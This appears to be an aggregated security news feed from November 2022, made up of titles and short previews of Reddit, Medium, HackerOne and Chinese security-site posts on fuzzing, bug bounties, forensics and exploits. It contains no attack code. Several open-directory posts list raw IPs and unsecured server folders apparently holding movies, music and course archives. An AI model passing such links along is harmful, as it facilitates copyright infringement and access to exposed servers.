    So I live in an apartment and I use my roommate's router. I only use my own laptop and nobody has physical access to my laptop and I check that I only use HTTPS websites every single time. Is there any risk that my roommate who controls the router will be able to see my private Gmails or private Facebook messages through hacking? ​ P.S. He works in IT and he bragged about hacking someone else's computer before.. submitted by /u/Box_desk [link] [comments]
  • Open

    Some mp3 and some JunK...
    Music mp3 format have a poke about... https://bootiemashup.com/wp-content/uploads/2015/02/?C=S;O=D ​ singy songy mp3's http://168.235.76.63/Downloads/ ​ Some cool images jpg format... http://www.kafkaesqueblog.com/wp-content/uploads/2016/01/?C=S;O=D ​ Bit of learning, Alan turing what a brain... https://papers.cnl.salk.edu/PDFs/ ​ And lets end this with total Bunkum... http://www.downloads.imune.net/medicalbooks/ ​ I don't see O/D as coming to the end, just what we are expecting from it... submitted by /u/xanderTgreat [link] [comments]
    Movies from 2019, English, high quality, decent dl speeds. Root folder has movies from 2016-17, 2021-22 and more in other languages.
    submitted by /u/draebor [link] [comments]
  • Open

    OSINT Exchange Rank v.0.1
    Друзья! Эта статья является немного отличающейся от других. Но важность ее может по итогу оказаться выше, чем все предыдущие. Continue reading on Medium »
    SPY NEWS: 2022 — Week 45
    Summary of the espionage-related news stories for the Week 45 (November 6–12) of 2022. Continue reading on Medium »
    OT Hunt: Moxa Nport
    This is the second topic of “OT Hunt” . These topics expose ICS/OT devices that are connected to the internet. The goal is to build an… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-13 Review
    信息搜集中的Tips by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-13 Review
    信息搜集中的Tips by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    Testing for QakBot’s most recent techniques
    Recovering purple teamer here, now leading CTI at Tidal Cyber. My role involves building freely available resources relevant for red, blue, & purple teamers. Last week I pushed a bunch of new threat maps to our community edition (no login required) - the goal is you can easily pivot or overlay offensive and/or defensive capabilities on top of these maps to see a) what you could readily test or b) where gaps exist that could be filled with custom tests/detections. This map shows the most recent techniques associated with QakBot, which I built based on a bunch of recent public CTI reports (sourcing throughout, and you can pivot to my notes with procedural details). I already overlaid Atomic Red Team's testing coverage on top, but you can modify this or add other testing capabilities like Scythe or AttackIQ: https://app.tidalcyber.com/share/47cf91c6-2afd-4027-9a00-cda5058cd41a A new US HHS report out Thursday detailed a bunch of techniques associated with Venus ransomware. I made another custom map around those, and a few more for other ransomware threatening US healthcare orgs this year, none of which are yet defined in ATT&CK. The combined view for those 5 ransomware (60 techniques total) looks like this: https://app.tidalcyber.com/share/09809998-6c73-4208-a507-8c1ca1b311e9 The Community Spotlight has all of the sub-components of those combined maps you can look at individually, and plenty of others. Let me know if I can look at making any others based on recent threats you'd like to see (or give it a go yourself and we can highlight your work in the spotlight). submitted by /u/Trop_Chaud [link] [comments]
  • Open

    Phishing with Google Calendar and Evilginx2 to Deliver a Malicious Zoom Link
    submitted by /u/Dr_Mantis_Tobbogon [link] [comments]
    The exploit recon 'msg_msg' and its mitigation in VED
    submitted by /u/hardenedvault [link] [comments]
  • Open

    Advice on how to perform IR on a remote host (lab help)
    submitted by /u/poppybois [link] [comments]
  • Open

    Fuzzing for bugs — 101
    Hey Squad, Continue reading on Medium »
  • Open

    Fuzzing for bugs — 101
    Hey Squad, Continue reading on Medium »
  • Open

    Analysis of a Smishing Text
    No content preview
  • Open

    Analysis of a Smishing Text
    No content preview
  • Open

    Analysis of a Smishing Text
    No content preview

  • Open

    Getting a comprehensive list of a website's outgoing links?
    When you enter a URL in VirusTotal and then click "Links", it shows some outgoing links, but it is not very comprehensive, it doesn't find all the links buried within scripts. For example rarbg, it only shows 2 outgoing links, but everyone knows that rarbg often has clickjacking and javascript redirects also. Why doesn't VirustoTotal list these urls as well? Is there a more comprehensive tool that finds all possible outgoing links within a website's scripts and everything else? If you could fetch such a list, and then add it to your hosts file before visiting a site, would you in theory be safe from any outgoing links while on that site? submitted by /u/rigain [link] [comments]
  • Open

    Introducing Shufflecake: plausible deniability for multiple hidden filesystems on Linux
    submitted by /u/0xdea [link] [comments]
    Reverse engineering an EV charger
    submitted by /u/FrankTr3nd [link] [comments]
    USENIX Security '22 Technical Sessions Talk Recordings
    submitted by /u/sanitybit [link] [comments]
    Tunneling Internet through WhatsApp to avoid network restrictions
    submitted by /u/aleixrodriala [link] [comments]
  • Open

    Forensics images for Practice?
    Any sources out there? I passed my gcfa exam - looking to use the tools I learned on other images. Is there a source like HacktheBox but for compromised images? Thnx in advance. submitted by /u/bigpoppaash [link] [comments]
    Analysts who find this stuff , how do you deal with it? I hope you get assistance or additional PTO.
    submitted by /u/RobbieRigel [link] [comments]
    Errors importing to Griffeye
    It came up at work recently about the number of errors often in the hundreds when importing C4ALL or Vics to Griffeye and what to do with those errors? I couldn’t answer it myself, can anyone out there as I’m told they are just ‘normal’ submitted by /u/DicksMyName [link] [comments]
    Extracting images from the RDP Session Cache
    submitted by /u/boutnaru [link] [comments]
    SANS FOR508 Labs
    Hi I was wondering if you could practise SANS GCFA exam labs bit on the SIFT workstation without actually doing the official labs from the training. If yes what sort of tools should I be focusing on? Also is it necessary to actually have the lab workbook with you to give you a better chance to pass? I just have an indexed course books hard copies from a friend, dont have the labs VM or workbook? submitted by /u/Unthiest [link] [comments]
  • Open

    Text books, yes...
    Some pretty heave entertaining reading here folks... https://textbookequity.org/Textbooks/ Stop now your evening is all sorted... submitted by /u/xanderTgreat [link] [comments]
    Beer...
    All about beer... http://staff.washington.edu/danej/beerfriday/beerpics/ last post got nuked...lol... submitted by /u/xanderTgreat [link] [comments]
    Fonts from tyfromtheinternet
    https://tyfromtheinternet.com/typetester/webfonts/ submitted by /u/diamond-emerald [link] [comments]
    What is a good search string to find FLAC audio?
    submitted by /u/Persimmon-Alone [link] [comments]
  • Open

    Write-up: Information disclosure on debug page @ PortSwigger Academy
    No content preview
    Understanding Privilege Escalation by Abusing Linux Access Control
    No content preview
    From Shodan Dork to Grafana Local File Inclusion
    No content preview
  • Open

    Write-up: Information disclosure on debug page @ PortSwigger Academy
    No content preview
    Understanding Privilege Escalation by Abusing Linux Access Control
    No content preview
    From Shodan Dork to Grafana Local File Inclusion
    No content preview
  • Open

    Write-up: Information disclosure on debug page @ PortSwigger Academy
    No content preview
    Understanding Privilege Escalation by Abusing Linux Access Control
    No content preview
    From Shodan Dork to Grafana Local File Inclusion
    No content preview
  • Open

    Digging the perfect fuzzing target (Winafl & WTF)
    If you ask me, the best part of fuzzing closed source targets is the REVERSING and of course checking the crash folder. But sometimes… Continue reading on Medium »
  • Open

    Digging the perfect fuzzing target (Winafl & WTF)
    If you ask me, the best part of fuzzing closed source targets is the REVERSING and of course checking the crash folder. But sometimes… Continue reading on Medium »
  • Open

    Subdomain takeover at http://test.www.midigator.com
    Equifax disclosed a bug submitted by valluvarsploit_h1: https://hackerone.com/reports/1718371
    Subdomain Takeover on delivey.yelp.com
    Yelp disclosed a bug submitted by racersaravanaa05: https://hackerone.com/reports/1715538
  • Open

    SecWiki News 2022-11-12 Review
    从一道题入门 UEFI PWN by 路人甲 ​CVE-2021-44707 Adobe Reader越界写漏洞分析与利用 by 路人甲 USTC Hackergame 2022 by 路人甲 Java安全攻防之老版本 Fastjson 的一些不出网利用 by 路人甲 最近碰到的 Python pickle 反序列化小总结 by 路人甲 jpress代码审计分享 by 路人甲 欧洲安全局发布《2022年网络安全威胁全景》报告 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-12 Review
    从一道题入门 UEFI PWN by 路人甲 ​CVE-2021-44707 Adobe Reader越界写漏洞分析与利用 by 路人甲 USTC Hackergame 2022 by 路人甲 Java安全攻防之老版本 Fastjson 的一些不出网利用 by 路人甲 最近碰到的 Python pickle 反序列化小总结 by 路人甲 jpress代码审计分享 by 路人甲 欧洲安全局发布《2022年网络安全威胁全景》报告 by ourren 更多最新文章,请访问SecWiki
  • Open

    OSINT Tip #1 — Contact Exploitation
    Contact exploitation is a technique in which you use a target phone number to leverage the “find friends” functionality within certain… Continue reading on Medium »
  • Open

    Getting stealthy persistence using Visual Studio Code
    Getting persistence with the windows terminal made me eager to search for more possible persistence methods. Being a full time software… Continue reading on Medium »
  • Open

    Bug Zero at a Glance [Week 5–11 November]
    Bug Zero is happy to be a part of #GEW2022 Continue reading on Bug Zero »
    Mobile App Scanner to Find Security Vulnerabilities
    The usage of mobile phones is increasing so are the apps for mobile phones. But with these comes a big problem or putting your data at… Continue reading on Medium »
    S3 misconfiguration
    Hi Everyone, my name is Aakash Rathee working as a DevSecOps Engineer (DevOps +Security) at Esper. This article is about an s3… Continue reading on Medium »
    Making API Bug Bounties A Breeze!
    A free tool that plays well with Burp/ZAP and accelerates bounty hunting! Continue reading on Medium »
  • Open

    FreeBuf早报 | 2022中国网安行业融资盘点;世界互联网大会发布《反电信网络诈骗倡议》
    截至 2022 年 11 月 10 日,2022 年度中国网络安全领域融资企业共计 99 家,融资金额由数千万元至数十亿元。
  • Open

    [译] Cilium 未来数据平面:支撑 100Gbit/s k8s 集群(KubeCon, 2022)
    译者序 本文翻译自 KubeCon+CloudNativeCon North America 2022 的一篇分享: 100 Gbit/s Clusters with Cilium: Building Tomorrow’s Networking Data Plane。 作者 Daniel Borkmann, Nikolay Aleksandrov, Nico Vibert 都来自 Isovalent(Cilium 母公司)。 翻译时补充了一些背景知识、代码片段和链接,以方便理解。 翻译已获得 Daniel 授权。 由于译者水平有限,本文不免存在遗漏或错误之处。如有疑问,请查阅原文。 以下是译文。 译者序 摘要 1 大型数据中心网络面临的挑战 1.1 Cilium 首次亮相(2016) 1.2 容器领域(k8s/docker)IPv6 支持状态 2016 年 2022 年 1.3 用户需求 1.4 解决方案 1.5 互联网服务 IPv6 部署现状 2 Cilium + IPv6-only K8s 集群 2.1 与传统 IPv4 网络/服务对接:NAT46/64 2.2 内核对 NAT46/64 的支持(4.8+) 2.3 Cilium 对 NAT46/64 的支持(v1.12+) 2.3.1 工作原理 2.3.2 功能支持 2.3.3 工作机制详解:集群入向(IPv4 -> IPv6-only) 方式一:有状态 NAT46 网关 方式二:无状态 NAT46 网关 2.3.3 工作机制详解:集群出向(IPv6-only -> IPv4) 2.4 Demo: Cilium NAT46/64 GW(略) 2.5 小结 3 Cilium + BIG TCP 3.1 BIG TCP 3.1.…

  • Open

    USB artifacts
    Hello community! Recently I found a discrepancy in tool reporting versus my registry analysis. I need help in identifying the difference between the two registry locations below. Background, the system being analyzed is a windows 10 enterprise ver 6.3 build 19044. Tool is EnCase ver 22 Registry locations: Location 1 Hklm.system.currentcontrolset.deviceclasses.53f56307-b6bf-11d0-94f2-00a0c91efb8b AND Location 2 Hklm.system.currentcontrolset.enum.usbstro.venprodversion.usbserial.properties.83da6326...0066 My understanding is: Location 1 last written time will give you the last connected time of the USB device location 2 last written time will give you the last connected time for the Corresponding USB within the key The issue is: Location 1 is saying 09/06 AND Location 2 is saying 09/13 I would greatly appreciate any insight, resources, or tips that can help clear this up. If you need more information please ask. submitted by /u/tummy_tickler2077 [link] [comments]
    Noob: I am trying to find a way to extract .ad1 files on the command line
    In the environment that I am doing this in, I have limited tools. In my environment, I am limited to Autopsy, FTK Imager, and libewf. What I am trying to do is find a way to help make some of my tasks more efficient by using command line tools in PowerShell on windows. I have searched high and low, and I cannot find a way to extract .ad1 files on the command line. I see many ways to make a .ad1 set from both the command line and by GUI. I already know how to do this via the GUI... I did find forensic7z.dll, a plugin for 7zip, but I am not sure I can get that into my environment. This would honestly be my perfect solution... Does anyone have any advice on how I can achieve this? While I can do this via the Gui if I have to, I would strongly prefer to use the command line to run multiple tasks in parallel. I really appreciate any help you can provide. submitted by /u/TheOriginalBvF [link] [comments]
  • Open

    More Stuff...
    Nurudl alert, lovely peeps... http://mirror.reenigne.net/gdc/ ​ Yes some squiggly text stuff or wrong something... https://video.edu.az/videos/video/ ​ What no Idea... http://62.171.143.142/?C=S&O=A ​ So freaking unexpected... http://www.ratsnest.com/pictures/minax/ ​ Last as its Me... Shocking, all complaints to me and not the hard worrrrking mods, Plz... https://archive.shadowwarfare.info submitted by /u/xanderTgreat [link] [comments]
    Recent TV shows, decent speed
    submitted by /u/datskinny [link] [comments]
    Some pop music
    http://penguinradio.dominican.edu/200303_music/ submitted by /u/Shitemoji69 [link] [comments]
  • Open

    Finding Reflected XSS In A Strange Way
    Today I will be talking about how I foua reflected XSS (“Cross Site Scripting”) vulnerability in a very popular bug bounty program and… Continue reading on Medium »
    How to find (“Business_logics”) AND (”Broken Access Control”) Bugs !
    Hello Awesome Hackers, I hope you all doing well! My name is Mohamed Anani Or 0xM5awy. Continue reading on Medium »
    From Shodan Dork to Grafana Local File Inclusion
    Hi readers 📖, This is my new article on local file inclusion I found using shodan recon and further exploiting grafana service. Continue reading on InfoSec Write-ups »
    From Shodan Dork to Grafana Local File Inclusion
    Hi readers 📖, This is my new article on local file inclusion I found using shodan recon and further exploiting grafana service. Continue reading on Medium »
    10 Awesome Tools For Bung Bounty
    Hey, guys! Continue reading on Medium »
    Bypass Duplicate Tweet Protection using negative tweet id
    Twitter doesn’t allow making tweets of same content in relatively near time frame. Continue reading on Medium »
    Intercept Mobil Application Pentest Flutter traffic on iOS and Android (HTTP/HTTPS/ Ssl Pinning)
    # Cyber Security Continue reading on Medium »
    CORS via XSS leaks User details including Credit Card details.
    Hi Hackers, This is one of the biggest e-commerce website in the world. But for the sake of privacy we’ll call it fakemart. While Testing… Continue reading on Medium »
    Introduction to software bug hunting [ENG/ESP]
    What is a vulnerability? Continue reading on Medium »
  • Open

    Testing in Go
    Some developers generally choose not to write tests for their code, or have many excuses for not writing them at all. I look inside myself… Continue reading on Medium »
    Short guide about how to install Protocol Fuzzer in Windows 10
    Protocol fuzzer (Peach Fuzzer) is a generational fuzzer that means it generates inputs from scratch. In this algorithm strategy, the fuzz… Continue reading on Medium »
  • Open

    Testing in Go
    Some developers generally choose not to write tests for their code, or have many excuses for not writing them at all. I look inside myself… Continue reading on Medium »
    Short guide about how to install Protocol Fuzzer in Windows 10
    Protocol fuzzer (Peach Fuzzer) is a generational fuzzer that means it generates inputs from scratch. In this algorithm strategy, the fuzz… Continue reading on Medium »
  • Open

    Intergalactic Warfare — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve another OSINT contract from hacktoria.com, and as amazing as the name sound, it’s contract card is… Continue reading on Medium »
    Another one cyberdetective trap
    Let’s discuss logging again, which is done through a redirect from a legitimate website. Colleagues gave me an example of the site Continue reading on Medium »
  • Open

    How to invalidate access of Google Authenticator on a device
    Had Google Authenticator running on two seperate devices. I no longer have access to Device1 and Authenticator is running on it. How do I somehow invalidate Device1 authenticator session? I do have access to Device2 and the Google account? If invalidating or logging out is not possible. How do I ensure that it might not get misused? submitted by /u/bawlachora [link] [comments]
    Australian law for penetration testing
    Hi, I am a small-time freelance penetration tester based in the US. I have a client who has introduced me to a potential client in Australia for web application testing. When I issue scoping documents to my clients, they are created in line with US law. I’ve researched and I believe I need to make my scoping document align with the law set out in the Criminal Code Act 1995 - Part 10.7. Is this the correct legislation I need to reference, and is there any others? Thank you submitted by /u/Responsible-Self7193 [link] [comments]
    Can I encrypt my OS drive without slowing down read/write?
    Can I use something such as VeraCrypt to encrypt my entire C: drive (in this case, an SSD) so that it requires password @ boot, but once password is entered the entire drive is unencrypted until power off? I'm only concerned about drives being stolen during break in, not when PC is running/logged in. I know I could just make an encrypted partition/folder but I don't want to have to remember to move all sensitive content over to there and make sure it's not lingering on OS partition. submitted by /u/deerlovecarrots [link] [comments]
  • Open

    GitHub launches channel to ease vulnerability disclosure process for OSS
    Article URL: https://www.scmagazine.com/analysis/application-security/github-launches-channel-to-ease-vulnerability-disclosure-process-for-open-source-software Comments URL: https://news.ycombinator.com/item?id=33562516 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-11-11 Review
    机器学习为何难以应用于真实的网络入侵检测系统?(下) by ourren [HTB] Driver Writeup by 0x584a Accidental $70k Google Pixel Lock Screen Bypass by ourren 体系化建设云上安全能力 by ourren 漏洞管理十大度量指标 by ourren 试与国内网络安全监管机构商榷二三事 by ourren 对ZDI公布的InfraSuite Device Master一揽子漏洞的分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-11 Review
    机器学习为何难以应用于真实的网络入侵检测系统?(下) by ourren [HTB] Driver Writeup by 0x584a Accidental $70k Google Pixel Lock Screen Bypass by ourren 体系化建设云上安全能力 by ourren 漏洞管理十大度量指标 by ourren 试与国内网络安全监管机构商榷二三事 by ourren 对ZDI公布的InfraSuite Device Master一揽子漏洞的分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Red Teaming: Perception Vs Reality
    The majority of skilled adversaries strike damage using relatively simple methods. Continue reading on Medium »
    Malware development pt. 3 — EXE vs DLL files
    Before we create our first Portable Executable (PE), we need to understand the two types which are DLL (Dynamic Link Library) and EXE… Continue reading on System Weakness »
    Malware development pt. 3 — EXE vs DLL files
    Before we create our first Portable Executable (PE), we need to understand the two types which are DLL (Dynamic Link Library) and EXE… Continue reading on Medium »
  • Open

    ScrapPY: a Python utility for scraping manuals, documents, and other sensitive PDFs to generate wordlists to perform brute force, forced browsing, and dictionary attacks. Updated with word frequency analysis!
    submitted by /u/Martial-Tartist2 [link] [comments]
    NETGEAR Nighthawk aws_json Pre-authentication Double Stack Overflow.
    submitted by /u/luci_morningstart [link] [comments]
    Find & exploit client-side prototype pollution, with labs
    submitted by /u/albinowax [link] [comments]
    Untangling Azure Active Directory Permissions II: Privileged Access
    submitted by /u/0xcsandker [link] [comments]
    NSA guidance on how to protect against software memory safety issues [pdf]
    submitted by /u/Gallus [link] [comments]
    Block web scanners with ipset & iptables
    submitted by /u/jwizq [link] [comments]
  • Open

    Off By One Security : A Look at Modern Windows Kernel Exploitation
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    FreeBuf周报 | 马斯克血洗推特安全部门;新形式钓鱼软件针对 Python开发人员
    总结推荐本周热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    机器学习在网络安全的运用价值究竟几何 | FreeBuf甲方群话题讨论
    目前热门的机器学习,凭借强大的数据处理、检测识别及自动学习等能力,在网络安全领域也开始发挥作用,那实际效果究竟如何?
    虚假马斯克账号都能认证?Twitter Blue订阅引发冒牌危机
    Twitter在近期推出的“ Twitter Blue”蓝色认证功能已开始被网络不法分子以冒充的形式滥用,让这项每月需花费7.99美元的订阅服务的认证机制及安全性受到质疑。
    俄罗斯背景的LockBit勒索软件运营商在加拿大被捕
    当地时间11月10日,欧洲刑警组织宣布在加拿大安大略省逮捕了一名LockBit勒索软件运营商,该勒索软件与俄罗斯相关。
    FreeBuf早报 | 计划到 2025 年每个居民一个电子健康码;乌克兰黑客入侵俄央行
    11月9日消息,乌克兰黑客分子称已成功入侵俄罗斯中央银行,并窃取到数千份内部文件。
  • Open

    automatic fuzz chromium from a easy way
    作者:areuu 原文链接:https://mp.weixin.qq.com/s/UllCnLCF4XQIC5WxrZYJbQ 本文介绍一个简便的方法构建自动挖掘chromium 框架。主要的想法是自动去跑生成的testcase ,然后检测结果是否触发了ASAN,触发了的话自动邮件发送符号化的邮件。 单纯的挖chromium,看你怎么挖了,有些漏洞window.close() 再加上一些fe...
    fuzzilli IL compiler 适配 ubuntu 20.04
    作者:areuu 原文链接:https://mp.weixin.qq.com/s/qxhmcpATMklTvvvb7ccVvg fuzzilli IL compiler 是将javascript 编译为fuzzilli 中间语言的工具,可以在fuzz 时导入到fuzzilli ,作为初始化的语料库。 不过看readme 的说明以及dockerfile 的安装,我这边是不容易安装好,版本也有...
  • Open

    automatic fuzz chromium from a easy way
    作者:areuu 原文链接:https://mp.weixin.qq.com/s/UllCnLCF4XQIC5WxrZYJbQ 本文介绍一个简便的方法构建自动挖掘chromium 框架。主要的想法是自动去跑生成的testcase ,然后检测结果是否触发了ASAN,触发了的话自动邮件发送符号化的邮件。 单纯的挖chromium,看你怎么挖了,有些漏洞window.close() 再加上一些fe...
    fuzzilli IL compiler 适配 ubuntu 20.04
    作者:areuu 原文链接:https://mp.weixin.qq.com/s/qxhmcpATMklTvvvb7ccVvg fuzzilli IL compiler 是将javascript 编译为fuzzilli 中间语言的工具,可以在fuzz 时导入到fuzzilli ,作为初始化的语料库。 不过看readme 的说明以及dockerfile 的安装,我这边是不容易安装好,版本也有...
  • Open

    Router NR1800X — Command injection via setUssd
    No content preview
    Destroying The Scammers Portal
    No content preview
    Reading My Crush Messages through XSS
    No content preview
  • Open

    Router NR1800X — Command injection via setUssd
    No content preview
    Destroying The Scammers Portal
    No content preview
    Reading My Crush Messages through XSS
    No content preview
  • Open

    Router NR1800X — Command injection via setUssd
    No content preview
    Destroying The Scammers Portal
    No content preview
    Reading My Crush Messages through XSS
    No content preview

  • Open

    Business Suite "Get Leads" Resulting in Revealing User Email & Phone
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1744194 - Bounty: $5500
    sensitive data exposure
    Reddit disclosed a bug submitted by saibalajis6: https://hackerone.com/reports/1716249
    api keys leaked
    Reddit disclosed a bug submitted by saibalajis6: https://hackerone.com/reports/1762927
  • Open

    Jumble of stuff...
    Films, TV Etc... I know there is more than 5 but clumped all film tv stuff together... http://158.69.224.17:88 http://23.147.64.113 http://steve.noip.eur.im/films/?C=S;O=D http://steve.noip.eur.im/films/?C=S;O=D https://dl.moviezland.ir/movies/collections/ Hope you find a film to pass the mundane evenings... ​ ​ Music MP3 format... https://www.newmusicserver.com/songs/?htaccess=songs ​ Mix films tv etc.. not engrish or might be some... https://sv3.hivamovie.com ​ Some clips MP4s images think its farsi, I found some funny... https://techrato.com/wp-content/uploads/2022/08/?SD ​ Some collage dri with images from 2010 etc.. funny's & atomic explosions images... http://web.mit.edu/ZoZ/Public/ ​ Some Lynda files rar format, that will learn you... https://www.kgay4all.com/seioqueseiporleroqueleio/Lynda/ ​ NSFW Last one images, check out sick... http://superkuh.com/pictures/?C=M&O=A ​ Come on its reddit... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Nightmare fuel — Hacktoria contract walkthrough (Understanding OSINT)
    OSINT stands for Open source intelligence. It basically means to gather information of a target, by using the internet and some… Continue reading on Medium »
    Recipe of Success for Tech Investigations (Journalism)
    Eight open source stories that leave a lasting impression are examined for their recipe for success. Continue reading on Medium »
    Zutaten investigativer Techrecherche
    Acht Open Source Geschichten, die einen bleibenden Eindruck hinterlassen, werden auf ihre Erfolgsrezepte hin untersucht. Continue reading on Medium »
    Open-source Intelligence Tools for Penetration Testing
    We live in a digital world where everything is online, and that is where you have to find applicable information about everything. This… Continue reading on Medium »
    10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
    TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or… Continue reading on The Gray Area »
  • Open

    Whatsapp Collection on Cellebrite
    Using Cellebrite Physical Analyzer 7.58.0.66 to do a WhatsApp web cloud extraction via scanning a whatsapp QR code. Unfortunately Cellebrite isn't pulling all the messages there seem to be messages missing? Have tried this with IOS & android phones, and have tried on older versions of Cellebrite to no avail. Anyone have idea why I can't seem to get all the WhatsApp messages? Also one iPhone had all the messages pulled but there was only 2 message threads and the dates ranged between 13/08/2022 - 03/11/2022. Many thanks submitted by /u/NJVUK [link] [comments]
    Go back to school for forensics?
    I am currently a security analyst in my early 20s with 3 years experience and work full time but have been thinking about going back to school since I don’t have a degree. My job has also offered to pay for the Encase or IACIS exam however I know that you need a degree in this field as well. Are there any online programs for full time workers I could attend? Is WGU an ok choice? Thanks! submitted by /u/PB_MutaNt [link] [comments]
    Mobile Forensic Testing Setup / Tooling
    Which setup do you use for mobile forensic testing? From time to time I would like to analyze the artifacts of a mobile application or mobile operating system. By that I mean I would like to install the app on a test or emulated device, play around with the app, and analyze the generated artifacts. I would like to be able to install apps from the app/play store and prefer an emulated solution. What setup do you have or can you recommend an emulator solution such as corellium or appetize? submitted by /u/F-2016 [link] [comments]
  • Open

    Write-up: Web shell upload via Content-Type restriction bypass @ PortSwigger Academy
    No content preview
    The tale of taking down the KBC scammers.
    No content preview
    Cross-origin resource sharing (CORS) Explanation & Exploitation ☠
    No content preview
    A Beginner’s Guide to Nmap
    No content preview
  • Open

    Write-up: Web shell upload via Content-Type restriction bypass @ PortSwigger Academy
    No content preview
    The tale of taking down the KBC scammers.
    No content preview
    Cross-origin resource sharing (CORS) Explanation & Exploitation ☠
    No content preview
    A Beginner’s Guide to Nmap
    No content preview
  • Open

    Write-up: Web shell upload via Content-Type restriction bypass @ PortSwigger Academy
    No content preview
    The tale of taking down the KBC scammers.
    No content preview
    Cross-origin resource sharing (CORS) Explanation & Exploitation ☠
    No content preview
    A Beginner’s Guide to Nmap
    No content preview
  • Open

    $70,000 bounty given by google to a hacker who accidentally bypass google pixel screen lock
    Google resolved a high security issue affecting all pixels devices. Continue reading on Medium »
    content discovery usage and tools with real example for bug bounty(part 1)
    Hello hackers today we will talk about the interesting and useful topic for bug hunters and penetration testers this topic is about how to… Continue reading on Medium »
    My Recon Tools and Methodology.
    Hey guys! What’s Up!? Hope you all are doing great! Here I’m Back with another blog!! I know I am late, and writing this after a very long… Continue reading on Medium »
    Google VRP (Acquisitions) — [Insecure Direct Object Reference] 2nd
    Hi All!, Yuuppp…It’s me again! XD. As the title suggests, I will share how I found the [Insecure Direct Object Reference] vulnerability in… Continue reading on Medium »
    Cross-origin resource sharing (CORS) Explanation & Exploitation ☠
    Hi! My name is Hashar Mujahid and today we will talk about Cross-origin resource sharing (CORS). Continue reading on InfoSec Write-ups »
    Sleep SQL injection on Name Parameter While Updating Profile
    Hi everyone, I am an Independent Cyber Security Researcher and a Bug Bounty Hunter from Pakistan. Continue reading on Medium »
    5 mistakes to avoid on the bug bounty program
    Improve your testing accuracy and get the most out of your findings Continue reading on Medium »
    10 Minute Bug Bounties: OSINT With Google Dorking, Censys, and Shodan
    TL;DR- One of the simplest and surprisingly paid bounties out there. This post is great for any bug-hunter who’s just starting out, or… Continue reading on The Gray Area »
  • Open

    xterm code execution via font ops (CVE-2022-45063)
    submitted by /u/Gallus [link] [comments]
    ATM/Kiosk Hacking - 2022 Payment Village
    submitted by /u/WiseTuna [link] [comments]
    Accidental $70k Google Pixel Lock Screen Bypass
    submitted by /u/_vavkamil_ [link] [comments]
    PcapPlusPlus v22.11 released - C++ library for capturing and analyzing network packets
    submitted by /u/seladb [link] [comments]
    Integer overflow in xmlParseNameComplex (libxml2) - CVE-2022-40303
    submitted by /u/Gallus [link] [comments]
    Capturing credentials from runZero (formerly Rumble.run) scanners
    submitted by /u/ss2342- [link] [comments]
  • Open

    Threat intelligence presented at CyberWarCon 2022 Summary
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-11-10 Review
    Spring Boot RCE到内存马探索 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-10 Review
    Spring Boot RCE到内存马探索 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    CVEs Found with Feedback-Based Fuzzing
    Article URL: https://www.code-intelligence.com/blog/5-cves-found-with-feedback-based-fuzzing Comments URL: https://news.ycombinator.com/item?id=33547320 Points: 3 # Comments: 0
  • Open

    Active Directory for Script Kiddies
    Introduction It seems like all these corporate types are using Active Directory. What is this “Active Directory”? And how can I use it to make my job as a Script Kiddie easier? Active Directory (AD) is a directory service developed by Microsoft for Windows networks and computers. A directory service is a shared database for... The post Active Directory for Script Kiddies appeared first on TrustedSec.
  • Open

    Starter jobs that don't involve user tech support
    Hey I just got CompTIA's Security+ and Linux+ certs, what are some roles I can consider to get the work experience required to take CISSP? Ideally something that doesn't involve user/tech support, ie fielding tech questions from many users submitted by /u/Trick_Vegetable_1157 [link] [comments]
  • Open

    Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server
    Unit 42 discovered three vulnerabilities in OpenLiteSpeed Web Server and LiteSpeed Web Server that could be used together for remote code execution. The post Unit 42 Finds Three Vulnerabilities in OpenLiteSpeed Web Server appeared first on Unit 42.
  • Open

    RED-TEAM PENETRATION TESTING
    The ‘red-team’ penetration test simulates real attack scenarios (“Friendly Hacking”) by bypassing security defenses while remaining… Continue reading on Medium »
    Learn Cybersecurity With These Resources
    Cybersecurity is a fast-growing field. In fact, the demand for qualified professionals in this field is expected to rise by up to 20% in… Continue reading on Medium »
    Only Attacks Can Help You Avoid Attacks!
    How many times have we seen that an organization comes to know about its cybersecurity loophole only after it was attacked. All recent big… Continue reading on Medium »
  • Open

    重磅议题发布 | CIS 2022网络安全创新大会北京分会场报名活动开启
    CIS 2022 网络安全创新大会北京分会场报名活动现已开启,11 月 30 日我们不见不散。
    美官方为软件供应商提出供应链安全指南
    该指南内容总共有40页,主要提及了软件供应商在供应链中所需要承担的责任和改进方法。
    2.7万份文件泄露,乌克兰”IT军团“入侵俄罗斯中央银行
    IT军团公开了一个大小为2.6GB的文件包,其中详细记录了银行业务、安全政策以及一些员工个人资料。
    地缘政治动荡助长网络安全威胁蔓延
    欧盟网络安全局发布年度威胁形势报告,总体来说,在 2021 年 7 月到 2022 年 7 月期间,地缘政治动荡对网络安全产生重大影响。
    实战打靶之trick
    该靶机首先通过一个ip,然后对ip进行信息收集,发现开放了22,80,25端口,接着使用脚本探测SMTP协议中存在那些用户,接着使用wfuzz进行文件子域名枚举。
    CVE-2022-36446 Webmin命令执行漏洞
    CVE-2022-36446 Webmin命令执行漏洞复现+分析
    与俄有关的间谍组织APT29利用Windows漏洞入侵欧洲外交实体网络
    此次攻击符合俄罗斯的国家利益和目标,也是APT29的一贯作风。
    将机密藏在三明治中,美国夫妇因出售核潜艇机密被判入狱
    海军工程师利用职务之便,协同妻子出售核潜艇机密信息,却被FBI卧底侦破。
  • Open

